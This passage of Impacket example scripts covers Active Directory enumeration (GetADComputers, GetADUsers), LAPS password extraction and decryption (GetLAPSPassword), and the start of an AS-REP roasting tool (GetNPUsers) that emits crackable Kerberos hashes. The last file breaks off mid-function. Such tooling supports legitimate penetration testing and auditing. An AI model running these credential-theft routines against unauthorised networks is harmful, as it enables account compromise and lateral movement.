self.__doKerberos = cmdLineOptions.k
#[!] in this script the value of -dc-ip option is self.__kdcIP and the value of -dc-host option is self.__kdcHost
self.__kdcIP = cmdLineOptions.dc_ip
self.__kdcHost = cmdLineOptions.dc_host
self.__requestUser = cmdLineOptions.user
self.__resolveIP = cmdLineOptions.resolveIP
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
# Let's calculate the header and format
if self.__resolveIP : #resolveIP flag is used, we will try to resolve the IP address
self.__header = ["SAM AcctName", "DNS Hostname", "OS Version", "OS", "IPAddress"]
# Since we won't process all rows at once, this will be fixed lengths
self.__colLen = [15, 35, 15, 35, 20]
self.__outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(self.__colLen)])
else:
self.__header = ["SAM AcctName", "DNS Hostname", "OS Version", "OS"]
# Since we won't process all rows at once, this will be fixed lengths
self.__colLen = [15, 35, 15, 20]
self.__outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(self.__colLen)])
@staticmethod
def getUnixTime(t):
t -= 116444736000000000
t /= 10000000
return t
def processRecord(self, item):
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
return
sAMAccountName = ''
dNSHostName = ''
operatingSystem = ''
operatingSystemVersion = ''
try:
if(self.__resolveIP): #will resolve the IP address
resolvedIPAddress=''
resolveIP = dns.resolver.Resolver()
dns.resolver.default_resolver = dns.resolver.Resolver(configure=False) #Dont want to use the default DNS in /etc/resolv.conf
dns.resolver.default_resolver.nameservers = [self.__kdcIP] #converting DCIP from STRING to LIST
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is True:
# sAMAccountName
sAMAccountName = attribute['vals'][0].asOctets().decode('utf-8')
if str(attribute['type']) == 'dNSHostName':
if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:
# dNSHostName + IP resolve
dNSHostName = attribute['vals'][0].asOctets().decode('utf-8')
try:
answers=dns.resolver.resolve(attribute['vals'][0].asOctets().decode('utf-8'),'A',tcp=True)
for rdata in answers:
resolvedIPAddress = rdata.address
except:
resolvedIPAddress = '<unable to resolve>'
if str(attribute['type']) == 'operatingSystem':
if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:
# operatingSystem
operatingSystem = attribute['vals'][0].asOctets().decode('utf-8')
if str(attribute['type']) == 'operatingSystemVersion':
if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:
# operatingSystemVersion
operatingSystemVersion = attribute['vals'][0].asOctets().decode('utf-8')
print((self.__outputFormat.format(*[sAMAccountName, dNSHostName, operatingSystemVersion,operatingSystem,resolvedIPAddress])))
else: #won't resolve the IP address
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is True:
# sAMAccountName
sAMAccountName = attribute['vals'][0].asOctets().decode('utf-8')
if str(attribute['type']) == 'dNSHostName':
if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:
# dNSHostName
dNSHostName = attribute['vals'][0].asOctets().decode('utf-8')
if str(attribute['type']) == 'operatingSystem':
if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:
# operatingSystem
operatingSystem = attribute['vals'][0].asOctets().decode('utf-8')
if str(attribute['type']) == 'operatingSystemVersion':
if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:
# operatingSystemVersion
operatingSystemVersion = attribute['vals'][0].asOctets().decode('utf-8')
print((self.__outputFormat.format(*[sAMAccountName, dNSHostName, operatingSystemVersion,operatingSystem])))
except Exception as e:
logging.debug("Exception", exc_info=True)
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
def run(self):
# Connect to LDAP
ldapConnection = ldap_login(self.__target, self.baseDN, self.__kdcIP, self.__kdcHost, self.__doKerberos, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
# updating "self.__target" as it may have changed in the ldap_login processing
self.__target = ldapConnection._dstHost
logging.info('Querying %s for information about domain.' % self.__target)
# Print header
print((self.__outputFormat.format(*self.__header)))
print((' '.join(['-' * itemLen for itemLen in self.__colLen])))
# Building the search filter
#searchFilter = '(objectCategory=computer)'
searchFilter = '(&(objectCategory=computer)(objectClass=computer))'
try:
logging.debug('Search Filter=%s' % searchFilter)
sc = ldap.SimplePagedResultsControl(size=100)
ldapConnection.search(searchFilter=searchFilter,attributes=['sAMAccountName','dNSHostName','operatingSystem','operatingSystemVersion'],sizeLimit=0, searchControls = [sc], perRecordCallback=self.processRecord)
except ldap.LDAPSearchError:
raise
ldapConnection.close()
# Process command-line arguments.
if __name__ == '__main__':
print((version.BANNER))
parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for computer data")
parser.add_argument('target', action='store', help='domain[/username[:password]]')
parser.add_argument('-user', action='store', metavar='username', help='Requests data for specific user ')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-resolveIP', action='store_true', help='Tries to resolve the IP address of computer objects, by performing the nslookup on the DC.')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) '
'specified in the target parameter')
group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller to use. '
'If ommited, the domain part (FQDN) '
'specified in the account parameter will be used')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts, options.debug)
domain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
try:
executer = GetADComputers(username, password, domain, options)
executer.run()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(str(e))
================================================
FILE: examples/GetADUsers.py
================================================
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# This script will gather data about the domain's users and their corresponding email addresses. It will also
# include some extra information about last logon and last password set attributes.
# You can enable or disable the the attributes shown in the final table by changing the values in line 184 and
# headers in line 190.
# If no entries are returned that means users don't have email addresses specified. If so, you can use the
# -all-users parameter.
#
# Author:
# Alberto Solino (@agsolino)
#
# Reference for:
# LDAP
#
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import logging
import sys
from datetime import datetime
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE
from impacket.examples import logger
from impacket.examples.utils import parse_identity, ldap_login
from impacket.ldap import ldap, ldapasn1
class GetADUsers:
def __init__(self, username, password, domain, cmdLineOptions):
self.options = cmdLineOptions
self.__username = username
self.__password = password
self.__domain = domain
self.__target = None
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
#[!] in this script the value of -dc-ip option is self.__kdcIP and the value of -dc-host option is self.__kdcHost
self.__kdcIP = cmdLineOptions.dc_ip
self.__kdcHost = cmdLineOptions.dc_host
self.__requestUser = cmdLineOptions.user
self.__all = cmdLineOptions.all
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
# Let's calculate the header and format
self.__header = ["Name", "Email", "PasswordLastSet", "LastLogon"]
# Since we won't process all rows at once, this will be fixed lengths
self.__colLen = [20, 30, 19, 19]
self.__outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(self.__colLen)])
@staticmethod
def getUnixTime(t):
t -= 116444736000000000
t /= 10000000
return t
def processRecord(self, item):
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
return
sAMAccountName = ''
pwdLastSet = ''
mail = ''
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:
# User Account
sAMAccountName = attribute['vals'][0].asOctets().decode('utf-8')
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'mail':
mail = str(attribute['vals'][0])
print((self.__outputFormat.format(*[sAMAccountName, mail, pwdLastSet, lastLogon])))
except Exception as e:
logging.debug("Exception", exc_info=True)
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
def run(self):
# Connect to LDAP
ldapConnection = ldap_login(self.__target, self.baseDN, self.__kdcIP, self.__kdcHost, self.__doKerberos, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
# updating "self.__target" as it may have changed in the ldap_login processing
self.__target = ldapConnection._dstHost
logging.info('Querying %s for information about domain.' % self.__target)
# Print header
print((self.__outputFormat.format(*self.__header)))
print((' '.join(['-' * itemLen for itemLen in self.__colLen])))
# Building the search filter
if self.__all:
searchFilter = "(&(sAMAccountName=*)(objectCategory=user)"
else:
searchFilter = "(&(sAMAccountName=*)(mail=*)(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))" % UF_ACCOUNTDISABLE
if self.__requestUser is not None:
searchFilter += '(sAMAccountName:=%s))' % self.__requestUser
else:
searchFilter += ')'
try:
logging.debug('Search Filter=%s' % searchFilter)
sc = ldap.SimplePagedResultsControl(size=100)
ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName', 'pwdLastSet', 'mail', 'lastLogon'],
sizeLimit=0, searchControls = [sc], perRecordCallback=self.processRecord)
except ldap.LDAPSearchError:
raise
ldapConnection.close()
# Process command-line arguments.
if __name__ == '__main__':
print((version.BANNER))
parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for users data")
parser.add_argument('target', action='store', help='domain[/username[:password]]')
parser.add_argument('-user', action='store', metavar='username', help='Requests data for specific user ')
parser.add_argument('-all', action='store_true', help='Return all users, including those with no email '
'addresses and disabled accounts. When used with -user it '
'will return user\'s info even if the account is disabled')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) '
'specified in the target parameter')
group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller to use. '
'If ommited, the domain part (FQDN) '
'specified in the account parameter will be used')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts, options.debug)
domain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
try:
executer = GetADUsers(username, password, domain, options)
executer.run()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(str(e))
================================================
FILE: examples/GetLAPSPassword.py
================================================
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# This script will gather data about the domain's computers and their LAPS/LAPSv2 passwords.
# Initial formatting for this tool came from the GetADUsers.py example script.
#
# Author(s):
# Thomas Seigneuret (@zblurx)
# Tyler Booth (@dru1d-foofus)
#
# Reference for:
# LDAP
#
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from datetime import datetime
from impacket import version
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.epm import hept_map
from impacket.dcerpc.v5.gkdi import MSRPC_UUID_GKDI, GkdiGetKey, GroupKeyEnvelope
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
from impacket.dpapi_ng import EncryptedPasswordBlob, KeyIdentifier, compute_kek, create_sd, decrypt_plaintext, unwrap_cek
from impacket.examples import logger
from impacket.examples.utils import parse_identity, ldap_login
from impacket.ldap import ldap, ldapasn1
from pyasn1.codec.der import decoder
from pyasn1_modules import rfc5652
import argparse
import json
import logging
import sys
class GetLAPSPassword:
@staticmethod
def printTable(items, header, outputfile):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
for row in items:
print(outputFormat.format(*row))
if outputfile:
with open(outputfile, 'w') as file:
outputFormat_file = '\t'.join(['{%d:%ds}' % (num, width) for num, width in enumerate(colLen)]) # Added tab delimited output for files
file.write(outputFormat_file.format(*header) + "\n")
for row in items:
file.write((outputFormat_file.format(*row)).strip() + "\n") # Removed extraneous field to clean up output saved to a file
def __init__(self, username, password, domain, cmdLineOptions):
self.options = cmdLineOptions
self.__username = username
self.__password = password
self.__domain = domain
self.__target = None
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__kdcIP = cmdLineOptions.dc_ip
self.__kdcHost = cmdLineOptions.dc_host
self.__targetComputer = cmdLineOptions.computer
self.__outputFile = cmdLineOptions.outputfile
self.__ldaps_flag = cmdLineOptions.ldaps_flag
self.__KDSCache = {}
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
def getLAPSv2Decrypt(self, rawEncryptedLAPSBlob):
try:
encryptedLAPSBlob = EncryptedPasswordBlob(rawEncryptedLAPSBlob)
parsed_cms_data, remaining = decoder.decode(encryptedLAPSBlob['Blob'], asn1Spec=rfc5652.ContentInfo())
enveloped_data_blob = parsed_cms_data['content']
parsed_enveloped_data, _ = decoder.decode(enveloped_data_blob, asn1Spec=rfc5652.EnvelopedData())
recipient_infos = parsed_enveloped_data['recipientInfos']
kek_recipient_info = recipient_infos[0]['kekri']
kek_identifier = kek_recipient_info['kekid']
key_id = KeyIdentifier(bytes(kek_identifier['keyIdentifier']))
tmp,_ = decoder.decode(kek_identifier['other']['keyAttr'])
sid = tmp['field-1'][0][0][1].asOctets().decode("utf-8")
target_sd = create_sd(sid)
laps_enabled = True
except Exception as e:
logging.error('Cannot unpack msLAPS-EncryptedPassword blob due to error %s' % str(e))
# Check if item is in cache
if key_id['RootKeyId'] in self.__KDSCache:
gke = self.__KDSCache[key_id['RootKeyId']]
else:
# Connect on RPC over TCP to MS-GKDI to call opnum 0 GetKey
stringBinding = hept_map(destHost=self.__target, remoteIf=MSRPC_UUID_GKDI, protocol = 'ncacn_ip_tcp')
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if hasattr(rpctransport, 'set_credentials'):
rpctransport.set_credentials(username=self.__username, password=self.__password, domain=self.__domain, lmhash=self.__lmhash, nthash=self.__nthash)
if self.__doKerberos:
rpctransport.set_kerberos(self.__doKerberos, kdcHost=self.__target)
if self.__kdcIP is not None:
rpctransport.setRemoteHost(self.__kdcIP)
rpctransport.setRemoteName(self.__target)
dce = rpctransport.get_dce_rpc()
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
logging.debug("Connecting to %s" % stringBinding)
try:
dce.connect()
except Exception as e:
logging.error("Something went wrong, check error status => %s" % str(e))
return laps_enabled
logging.debug("Connected")
try:
dce.bind(MSRPC_UUID_GKDI)
except Exception as e:
logging.error("Something went wrong, check error status => %s" % str(e))
return laps_enabled
logging.debug("Successfully bound")
logging.debug("Calling MS-GKDI GetKey")
resp = GkdiGetKey(dce, target_sd=target_sd, l0=key_id['L0Index'], l1=key_id['L1Index'], l2=key_id['L2Index'], root_key_id=key_id['RootKeyId'])
# Unpack GroupKeyEnvelope
gke = GroupKeyEnvelope(b''.join(resp['pbbOut']))
self.__KDSCache[gke['RootKeyId']] = gke
kek = compute_kek(gke, key_id)
enc_content_parameter = bytes(parsed_enveloped_data["encryptedContentInfo"]["contentEncryptionAlgorithm"]["parameters"])
iv, _ = decoder.decode(enc_content_parameter)
iv = bytes(iv[0])
cek = unwrap_cek(kek, bytes(kek_recipient_info['encryptedKey']))
return decrypt_plaintext(cek, iv, remaining)
@staticmethod
def getUnixTime(t):
t -= 116444736000000000
t /= 10000000
return t
def run(self):
# Connect to LDAP
ldapConnection = ldap_login(self.__target, self.baseDN, self.__kdcIP, self.__kdcHost, self.__doKerberos, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, self.__ldaps_flag)
# updating "self.__target" as it may have changed in the ldap_login processing
self.__target = ldapConnection._dstHost
# Building the search filter
searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))" # Default search filter value
if self.__targetComputer is not None:
searchFilter += '(name=' + self.__targetComputer + ')'
searchFilter += ")"
try:
# Microsoft Active Directory set an hard limit of 1000 entries returned by any search
paged_search_control = ldapasn1.SimplePagedResultsControl(criticality=True, size=1000)
resp = ldapConnection.search(searchFilter=searchFilter,
attributes=['msLAPS-EncryptedPassword', 'msLAPS-PasswordExpirationTime', 'msLAPS-Password', 'sAMAccountName', \
'ms-Mcs-AdmPwdExpirationTime', 'ms-MCS-AdmPwd'],
searchControls=[paged_search_control])
except ldap.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
# We should never reach this code as we use paged search now
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
resp = e.getAnswers()
pass
else:
raise
entries = []
logging.debug('Total of records returned %d' % len(resp))
if len(resp) == 0:
if self.__targetComputer is not None:
logging.error('%s$ not found in LDAP.' % self.__targetComputer)
else:
logging.error("No valid entry in LDAP")
return
for item in resp:
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
continue
try:
sAMAccountName = None
lapsPasswordExpiration = None
lapsUsername = None
lapsPassword = None
lapsv2 = False
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
if str(attribute['type']) == 'msLAPS-EncryptedPassword':
lapsv2 = True
plaintext = self.getLAPSv2Decrypt(bytes(attribute['vals'][0]))
r = json.loads(plaintext[:-18].decode('utf-16le'))
# timestamp = r["t"]
lapsUsername = r["n"]
lapsPassword = r["p"]
elif str(attribute['type']) == 'ms-Mcs-AdmPwdExpirationTime' or str(attribute['type']) == 'msLAPS-PasswordExpirationTime':
if str(attribute['vals'][0]) != '0':
lapsPasswordExpiration = datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))).strftime('%Y-%m-%d %H:%M:%S')
elif str(attribute['type']) == 'ms-Mcs-AdmPwd':
lapsPassword = attribute['vals'][0].asOctets().decode('utf-8')
if sAMAccountName is not None and lapsPassword is not None:
entry = [sAMAccountName,lapsUsername, lapsPassword, lapsPasswordExpiration, str(lapsv2)]
entry = [element if element is not None else 'N/A' for element in entry]
entries.append(entry)
except Exception as e:
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(entries) == 0:
if self.__targetComputer is not None:
logging.error("No LAPS data returned for %s" % self.__targetComputer)
else:
logging.error("No LAPS data returned")
return
self.printTable(entries,['Host','LAPS Username','LAPS Password','LAPS Password Expiration', 'LAPSv2'], self.__outputFile)
# Process command-line arguments.
if __name__ == '__main__':
print((version.BANNER))
parser = argparse.ArgumentParser(add_help = True, description = "Extract LAPS passwords from LDAP")
parser.add_argument('target', action='store', help='domain[/username[:password]]')
parser.add_argument('-computer', action='store', metavar='computername', help='Target a specific computer by its name')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-outputfile', '-o', action='store', help='Outputs to a file.')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CcnAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) '
'specified in the target parameter')
group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller to use. '
'If ommited, the domain part (FQDN) '
'specified in the account parameter will be used')
group.add_argument('-ldaps', dest='ldaps_flag', action="store_true", help='Enable LDAPS (LDAP over SSL). '
'Required when querying a Windows Server 2025'
'domain controller with LDAPS enforced.')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts, options.debug)
domain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
try:
executer = GetLAPSPassword(username, password, domain, options)
executer.run()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(str(e))
================================================
FILE: examples/GetNPUsers.py
================================================
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# This script will attempt to list and get TGTs for those users that have the property
# 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH).
# For those users with such configuration, a John The Ripper output will be generated so
# you can send it for cracking.
#
# Original credit for this technique goes to @harmj0y:
# https://blog.harmj0y.net/activedirectory/roasting-as-reps/
# Related work by Geoff Janjua:
# https://www.exumbraops.com/layerone2016/party
#
# For usage instructions run the script with no parameters.
#
# Author:
# Alberto Solino (@agsolino)
#
from __future__ import division
from __future__ import print_function
import argparse
import datetime
import logging
import random
import sys
from binascii import hexlify
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH
from impacket.examples import logger
from impacket.examples.utils import parse_identity, ldap_login
from impacket.krb5 import constants
from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, seq_set, seq_set_iter
from impacket.krb5.kerberosv5 import sendReceive, KerberosError
from impacket.krb5.types import KerberosTime, Principal
from impacket.ldap import ldap, ldapasn1
class GetUserNoPreAuth:
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def __init__(self, username, password, domain, cmdLineOptions):
self.__username = username
self.__password = password
self.__domain = domain
self.__target = None
self.__lmhash = ''
self.__nthash = ''
self.__no_pass = cmdLineOptions.no_pass
self.__outputFileName = cmdLineOptions.outputfile
self.__outputFormat = cmdLineOptions.format
self.__usersFile = cmdLineOptions.usersfile
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__requestTGT = cmdLineOptions.request
#[!] in this script the value of -dc-ip option is self.__kdcIP and the value of -dc-host option is self.__kdcHost
self.__kdcIP = cmdLineOptions.dc_ip
self.__kdcHost = cmdLineOptions.dc_host
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
@staticmethod
def getUnixTime(t):
t -= 116444736000000000
t /= 10000000
return t
def getTGT(self, userName, requestPAC=True):
clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
asReq = AS_REQ()
domain = self.__domain.upper()
serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
pacRequest = KERB_PA_PAC_REQUEST()
pacRequest['include-pac'] = requestPAC
encodedPacRequest = encoder.encode(pacRequest)
asReq['pvno'] = 5
asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
asReq['padata'] = noValue
asReq['padata'][0] = noValue
asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
asReq['padata'][0]['padata-value'] = encodedPacRequest
reqBody = seq_set(asReq, 'req-body')
opts = list()
opts.append(constants.KDCOptions.forwardable.value)
opts.append(constants.KDCOptions.renewable.value)
opts.append(constants.KDCOptions.proxiable.value)
reqBody['kdc-options'] = constants.encodeFlags(opts)
seq_set(reqBody, 'sname', serverName.components_to_asn1)
seq_set(reqBody, 'cname', clientName.components_to_asn1)
if domain == '':
raise Exception('Empty Domain not allowed in Kerberos')
reqBody['realm'] = domain
now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
reqBody['till'] = KerberosTime.to_asn1(now)
reqBody['rtime'] = KerberosTime.to_asn1(now)
reqBody['nonce'] = random.getrandbits(31)
supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
seq_set_iter(reqBody, 'etype', supportedCiphers)
message = encoder.encode(asReq)
try:
r = sendReceive(message, domain, self.__kdcIP)
except KerberosError as e:
if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
# RC4 not available, OK, let's ask for newer types
supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)
seq_set_iter(reqBody, 'etype', supportedCiphers)
message = encoder.encode(asReq)
r = sendReceive(message, domain, self.__kdcIP)
else:
raise e
# This should be the PREAUTH_FAILED packet or the actual TGT if the target principal has the
# 'Do not require Kerberos preauthentication' set
try:
asRep = decoder.decode(r, asn1Spec=KRB_ERROR())[0]
except:
# Most of the times we shouldn't be here, is this a TGT?
asRep = decoder.decode(r, asn1Spec=AS_REP())[0]
else:
# The user doesn't have UF_DONT_REQUIRE_PREAUTH set
raise Exception('User %s doesn\'t have UF_DONT_REQUIRE_PREAUTH set' % userName)
# Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it.
if self.__outputFormat == 'john':
# Check what type of encryption is used for the enc-part data
# This will inform how the hash output needs to be formatted
if asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18:
return '$krb5asrep$%d$%s%s$%s$%s' % (asRep['enc-part']['etype'], domain, clientName,
hexlify(asRep['enc-part']['cipher'].asOctets()[:-12]).decode(),
hexlify(asRep['enc-part']['cipher'].asOctets()[-12:]).decode())
else:
return '$krb5asrep$%s@%s:%s$%s' % (clientName, domain,
hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())
# Let's output the TGT enc-part/cipher in Hashcat format, in case somebody wants to use it.
else:
# Check what type of encryption is used for the enc-part data
# This will inform how the hash output needs to be formatted
if asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18:
return '$krb5asrep$%d$%s$%s$%s$%s' % (asRep['enc-part']['etype'], clientName, domain,
